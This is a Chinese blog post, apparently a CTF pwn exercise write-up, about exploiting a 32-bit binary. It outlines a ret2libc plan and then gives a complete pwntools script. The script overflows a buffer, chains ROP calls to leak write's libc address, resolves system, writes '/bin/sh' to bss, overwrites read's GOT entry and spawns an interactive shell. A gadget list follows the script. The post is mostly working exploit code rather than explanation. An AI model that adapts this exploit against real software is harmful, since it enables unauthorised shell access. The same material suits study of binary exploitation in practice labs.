任务5

于 2019-02-15 09:41:14 发布
阅读量234 收藏
点赞数
分类专栏: pwn 文章标签: rop 32位
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Maxmalloc/article/details/87341971
版权

说一下思路
1.泄露libc,得到system
2.将/bin/sh写入bss
3.将system写入read的got表里
4.执行read

from pwn import *
from LibcSearcher import *

context.log_level='debug'
context.terminal=['gnome-terminal','-x','sh','-c']
p=process('./dltest')
elf=ELF('./dltest')
p.recvuntil('~!\n')
bss=0x804a000+0x400
#pwnlib.gdb.attach(p)
shellcode='a'*(0x6c+4)
shellcode+=p32(elf.plt['write'])+p32(0x080485cc)+p32(1)+p32(elf.got['write'])+p32(4)
shellcode+=p32(elf.plt['read'])+p32(0x080485cc)+p32(0)+p32(bss)+p32(8)
shellcode+=p32(elf.plt['read'])+p32(0x080485cc)+p32(0)+p32(elf.got['read'])+p32(4)
shellcode+=p32(elf.plt['read'])+p32(0)+p32(bss)
p.sendline(shellcode)

write=u32(p.recv(4).ljust(4,'\x00'))
libc=LibcSearcher('write',write)
system=write-libc.dump('write')+libc.dump('system')
p.send('/bin/sh\x00')
p.send(p32(system))

p.interactive()
'''
0x080485ce : pop ebp ; ret
0x080485cc : pop ebx ; pop edi ; pop ebp ; ret
0x0804862c : pop ebx ; pop esi ; pop edi ; pop ebp ; ret
0x08048381 : pop ebx ; ret
0x080485cd : pop edi ; pop ebp ; ret
0x0804862d : pop esi ; pop edi ; pop ebp ; ret
'''
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值